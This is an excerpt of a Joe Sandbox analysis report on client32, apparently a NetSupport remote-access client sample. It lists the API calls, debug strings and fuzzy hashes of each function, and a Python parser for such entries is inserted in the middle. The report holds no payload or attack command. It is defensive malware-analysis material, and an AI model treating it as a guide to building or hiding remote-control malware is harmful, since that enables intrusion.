                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _strtok$_malloc
                                                                                • String ID: *extra_bytes$..\ctl32\AUDIO.CPP$Audio$Send EV_CONFIGSET from %s@%d$nbytes <= sizeof (extra_bytes)
                                                                                • API String ID: 665538724-3655815180
                                                                                • Opcode ID: 39f51e78e1d6d557cb57fe6939ee2718794244c86e9f6e4480e23a56394e5660
                                                                                • Instruction ID: adf310d86d08ca25db8df7bbab2a8961bf55d7c961d25e6615f2bb86ec9d3f5a
                                                                                • Opcode Fuzzy Hash: 39f51e78e1d6d557cb57fe6939ee2718794244c86e9f6e4480e23a56394e5660
                                                                                • Instruction Fuzzy Hash: 17A14874E012299FDB61CF24C990BEAF7F4AF49344F1484E9D98DA7241E770AA84CF91
                                                                                APIs
                                                                                • CountClipboardFormats.USER32 ref: 11033091
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                  • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                                • EnumClipboardFormats.USER32(00000000), ref: 110330F6
                                                                                • GetLastError.KERNEL32 ref: 110331BF
                                                                                • GetLastError.KERNEL32(00000000), ref: 110331C2
                                                                                • IsClipboardFormatAvailable.USER32(00000008), ref: 11033225
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ClipboardErrorLast$Formats$AvailableCountEnumExitFormatMessageProcess_malloc_memsetwsprintf
                                                                                • String ID: ..\ctl32\clipbrd.cpp$Error enumclip, e=%d, x%x$ppFormats
                                                                                • API String ID: 3210887762-597690070
                                                                                • Opcode ID: 783cfaeac01b76432846342580ba7980eef49404acbb133f97720025ffc7a27a
                                                                                • Instruction ID: b804fa4b4600a3d7d633b164336aeb5b10f9113d5bb37ecf981567cf99ca6661
                                                                                • Opcode Fuzzy Hash: 783cfaeac01b76432846342580ba7980eef49404acbb133f97720025ffc7a27a
                                                                                • Instruction Fuzzy Hash: 02518B75E1822A8FDB10CFA8C8C479DFBB4EB85319F1041AAD859AB341EB719944CF90
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(111EE294,1B702977,?,?,?,?,00000000,11181BDE), ref: 110535C4
                                                                                • LeaveCriticalSection.KERNEL32(111EE294,00000000,?,?,?,?,00000000,11181BDE), ref: 11053789
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • std::exception::exception.LIBCMT ref: 11053635
                                                                                • __CxxThrowException@8.LIBCMT ref: 1105364A
                                                                                • GetTickCount.KERNEL32 ref: 11053660
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 11053747
                                                                                • LeaveCriticalSection.KERNEL32(111EE294,list<T> too long,00000000,?,?,?,?,00000000,11181BDE), ref: 11053751
                                                                                  • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$CountEnterException@8ThrowTickXinvalid_argument_free_malloc_memsetstd::_std::exception::exceptionwsprintf
                                                                                • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$list<T> too long
                                                                                • API String ID: 2238969640-1197860701
                                                                                • Opcode ID: 56db25419c0e47adced9616d36e05b27263c0d593e28ae4636820008f3c37c9f
                                                                                • Instruction ID: 9fd56e3a4776fcf28e1c6ce8a1981ca07dec16432dee4cc0167aa7d7c32ba94c
                                                                                • Opcode Fuzzy Hash: 56db25419c0e47adced9616d36e05b27263c0d593e28ae4636820008f3c37c9f
                                                                                • Instruction Fuzzy Hash: 31517179E062659FDB45CFA4C984AADFBA4FF09348F008169E8159B344F731A904CBA5
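The per-function entries above (for example the clipboard-enumeration routine, whose error path reaches ExitProcess through a sub-call, and the NSMString routine, whose String ID leaks the vendor build path) are easier to triage as structured records than as rendered text. The parser below is an added example written for this page and is not part of the Joe Sandbox report or of NetSupport; it assumes the entry layout exactly as rendered here (the section headers "APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Yara matches" and "Similarity", "•"-bulleted lines, and the "Name.MODULE(args), ref: ADDR" call notation). The sample input is a constructed excerpt of two entries from this report with the "Associated" dump lines and some ID fields omitted.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Section headers that divide one function entry; "APIs" opens a new entry.
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Yara matches", "Similarity"}
# "• Name.MODULE(args), ref: ADDR", optionally prefixed "Part of subcall function ADDR:".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[^\s(]+?)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")
# Debug strings that leak the vendor build tree: a backslash or a .cpp/.h suffix.
SOURCE_REF_RE = re.compile(r"\\|\.(?:cpp|h)$", re.I)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int                    # address of the call site
    subcall_of: Optional[int]   # callee address when the call sits one level down


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)     # Source File, IDs, fuzzy hashes
    strings: list = field(default_factory=list)  # "String ID" split on '$'


def parse_entries(text):
    entries, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":
                current = FunctionEntry()
                entries.append(current)
            section = line
            continue
        if current is None:      # tail of an entry that began before the excerpt
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                current.apis.append(ApiCall(
                    m["name"], m["module"],
                    [a for a in (m["args"] or "").split(",") if a],
                    int(m["ref"], 16), int(m["sub"], 16) if m["sub"] else None))
        else:
            m = KV_RE.match(line)
            if m:
                current.meta[m["key"]] = m["value"]
                if m["key"] == "String ID":
                    current.strings = [s for s in m["value"].split("$") if s]
    return entries


def api_names(entry, include_subcalls=True):
    return {c.name for c in entry.apis if include_subcalls or c.subcall_of is None}


def entries_calling(entries, api):
    return [e for e in entries if api in api_names(e)]


def source_refs(entries):
    return sorted({s for e in entries for s in e.strings if SOURCE_REF_RE.search(s)})


def fuzzy_index(entries):
    """Instruction fuzzy hash -> Opcode ID, for matching functions across samples."""
    return {e.meta["Instruction Fuzzy Hash"]: e.meta["Opcode ID"]
            for e in entries if "Instruction Fuzzy Hash" in e.meta}


# Constructed input: two entries excerpted from this report, trimmed.
SAMPLE = r"""
APIs
• CountClipboardFormats.USER32 ref: 11033091
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
• EnumClipboardFormats.USER32(00000000), ref: 110330F6
• IsClipboardFormatAvailable.USER32(00000008), ref: 11033225
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Yara matches
Similarity
• API ID: ClipboardErrorLast$Formats$AvailableCountEnumExitFormatMessageProcess_malloc_memsetwsprintf
• String ID: ..\ctl32\clipbrd.cpp$Error enumclip, e=%d, x%x$ppFormats
• Opcode ID: 783cfaeac01b76432846342580ba7980eef49404acbb133f97720025ffc7a27a
• Instruction Fuzzy Hash: 02518B75E1822A8FDB10CFA8C8C479DFBB4EB85319F1041AAD859AB341EB719944CF90
APIs
• EnterCriticalSection.KERNEL32(111EE294,1B702977,?,?,?,?,00000000,11181BDE), ref: 110535C4
• GetTickCount.KERNEL32 ref: 11053660
• LeaveCriticalSection.KERNEL32(111EE294,list<T> too long,00000000,?,?,?,?,00000000,11181BDE), ref: 11053751
Strings
Similarity
• String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$list<T> too long
• Opcode ID: 56db25419c0e47adced9616d36e05b27263c0d593e28ae4636820008f3c37c9f
• Instruction Fuzzy Hash: 31517179E062659FDB45CFA4C984AADFBA4FF09348F008169E8159B344F731A904CBA5
"""

if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    print(len(parsed), "entries; source refs:", source_refs(parsed))
    for e in entries_calling(parsed, "ExitProcess"):
        print("exit path reachable via", sorted(api_names(e)))
```

Calls reported under "Part of subcall function" are kept but tagged with the callee address, so `api_names(entry, include_subcalls=False)` gives only what the function itself imports; `source_refs` pulls out the build-tree strings that identify the NetSupport client build, and `fuzzy_index` keys each function by its instruction fuzzy hash so the same routine can be recognised in a differently packed sample.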
                                                                                APIs
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • GetOEMCP.KERNEL32(View,Cachesize,00000400,00000000,776CC3F0,00000000), ref: 11065525
                                                                                  • Part of subcall function 11064880: _strtok.LIBCMT ref: 110648C0
                                                                                  • Part of subcall function 11064880: _strtok.LIBCMT ref: 110648F0
                                                                                • GetDC.USER32(00000000), ref: 11065558
                                                                                • GetDeviceCaps.GDI32(00000000,0000000E), ref: 11065563
                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 1106556E
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 110655B9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CapsDevice_strtok$Release__wcstoi64
                                                                                • String ID: 932, 949, 1361, 874, 862$Cachesize$Codepage$DBCS$View
                                                                                • API String ID: 3945178471-2526036698
                                                                                • Opcode ID: 058c2aae16d643b31adc47a1744bed462daca89727d2630be5973e582d58aa57
                                                                                • Instruction ID: 682317bc02e2a30c69588dc0a9c96f0ce4cbb9861371b6ad8b8e837dbdf19ace
                                                                                • Opcode Fuzzy Hash: 058c2aae16d643b31adc47a1744bed462daca89727d2630be5973e582d58aa57
                                                                                • Instruction Fuzzy Hash: DA21497AE002246BE3149F75CDC4BA9FB98FB08354F014565F969EB280D775A940C7D0
                                                                                APIs
                                                                                • GetMenuItemCount.USER32 ref: 1101F2B5
                                                                                • _memset.LIBCMT ref: 1101F2D8
                                                                                • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1101F2F6
                                                                                • _free.LIBCMT ref: 1101F305
                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                • _free.LIBCMT ref: 1101F30E
                                                                                • DeleteObject.GDI32(00000000), ref: 1101F32D
                                                                                • DeleteObject.GDI32(00000000), ref: 1101F33B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeleteItemMenuObject_free$CountErrorFreeHeapInfoLast_memset
                                                                                • String ID: $0$UndoOwnerDraw
                                                                                • API String ID: 4094458939-790594647
                                                                                • Opcode ID: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
                                                                                • Instruction ID: 9f4c9540ed3e85911a06978235dbefa5e19a2329fc37d196683f21109e2371eb
                                                                                • Opcode Fuzzy Hash: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
                                                                                • Instruction Fuzzy Hash: 16119671E162299BDB04DFE49C85B9DFBECBB18318F000069E814D7244E674A5108B91
                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 1106F737
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106F788
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 1106F7A8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeavewsprintf
                                                                                • String ID: %s:%d$(null)$ListenPort$NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s$Port$TCPIP$UseNCS$tracerecv
                                                                                • API String ID: 3005300677-3496508882
                                                                                • Opcode ID: b470564540ec67704f5c8bb6b18a5cda2ad223c2dcf1e5bacda87c2cf28e558c
                                                                                • Instruction ID: f86a0a3523b45ae2aa4ac8696085f91b0c00e2f9513f1a57450127c273c63767
                                                                                • Opcode Fuzzy Hash: b470564540ec67704f5c8bb6b18a5cda2ad223c2dcf1e5bacda87c2cf28e558c
                                                                                • Instruction Fuzzy Hash: 17B19F79E003169FDB10CF64CC90FAAB7B9AF89708F50419DE909A7241EB75AD41CF62
                                                                                APIs
                                                                                • IsWindow.USER32(00000000), ref: 1104147B
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • SendMessageTimeoutA.USER32(?,0000004A,00040310,?,00000002,00002710,?), ref: 11041670
                                                                                • _free.LIBCMT ref: 11041677
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessageSendTimeoutWindow__wcstoi64_free
                                                                                • String ID: Client$DisableJournalMenu$IsA()$Journal status( bNoMenu = %d, gpJournal = %x, %d, %d) bVistaUI %d$SendJournalStatustoSTUI(%d, %d, %d, %d)$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                • API String ID: 1897251511-2352888828
                                                                                • Opcode ID: fa5a56d3959a27f69506f65d8ccf5def50a2be3eef365412e5d35b6d21c3e654
                                                                                • Instruction ID: 7d7d201ace8770d3ab851aba43ef7aa7a0e05de8b0dcb1a0fb6fb2d6540d47c3
                                                                                • Opcode Fuzzy Hash: fa5a56d3959a27f69506f65d8ccf5def50a2be3eef365412e5d35b6d21c3e654
                                                                                • Instruction Fuzzy Hash: 37717DB5F0021AAFDB04DFD4CCC0AEEF7B5AF48304F244279E516A7685E631A905CBA1
                                                                                APIs
                                                                                • OpenDesktopA.USER32(Default,00000000,00000000,00000041), ref: 110418C9
                                                                                • EnumDesktopWindows.USER32(00000000,Function_000416A0,?), ref: 110418E7
                                                                                • CloseDesktop.USER32(00000000), ref: 110418EE
                                                                                • _malloc.LIBCMT ref: 11041975
                                                                                • _memmove.LIBCMT ref: 11041992
                                                                                • SendMessageTimeoutA.USER32(?,0000004A,00040310,00000687,00000002,00002710,?), ref: 110419CE
                                                                                • GetLastError.KERNEL32 ref: 110419D4
                                                                                • _free.LIBCMT ref: 110419DB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Desktop$CloseEnumErrorLastMessageOpenSendTimeoutWindows_free_malloc_memmove
                                                                                • String ID: Default
                                                                                • API String ID: 3929658058-753088835
                                                                                • Opcode ID: 21436066e6ad4443d4690e0e35ce7149412e1656e3ef060addf959b48acce737
                                                                                • Instruction ID: 0a4c041bdd0654e93387037eab9a5714a5cdb1d116a6a5b81f645acbf217ae6d
                                                                                • Opcode Fuzzy Hash: 21436066e6ad4443d4690e0e35ce7149412e1656e3ef060addf959b48acce737
                                                                                • Instruction Fuzzy Hash: CD716F79E0021A9FDB04DFE4C8809EEF7B9FF48304F108169E516A7244EB74BA45CB94
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 110513F9
                                                                                • CloseHandle.KERNEL32(?,Client,UserAcknowledge,00000000,00000000), ref: 110514DB
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle__wcstoi64_memset
